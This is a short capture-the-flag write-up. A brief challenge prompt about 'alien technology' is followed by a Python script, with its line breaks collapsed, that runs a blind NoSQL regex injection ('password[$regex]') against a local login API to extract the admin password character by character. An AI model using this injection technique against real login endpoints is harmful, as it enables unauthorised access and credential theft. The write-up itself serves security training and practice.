Outdated Alien technology has been found by the human resistance. The system might contain sensitive information that could be of use to us. Our experts are trying to find a way into the system. Can you help?
Solution
import requestsimport stringflag ="CHTB{"url ="http://127.0.0.1:1337/api/login"# Each time a successful login is seen, restart looprestart =Truewhile restart: restart =False# Characters like *, ., &, and + has to be avoided because we use regexfor i in"_"+ string.ascii_lowercase + string.digits +"!#$%^()@{}": payload = flag + i post_data ={'username':'admin','password[$regex]': payload +".*"} r = requests.post(url, data=post_data, allow_redirects=False)# Correct char results in "successful password"if'Successful'in r.text:print(payload) restart =True flag = payload# Exit if "}" gives a valid redirectif i =="}":print("\nFlag: "+ flag)exit(0)break
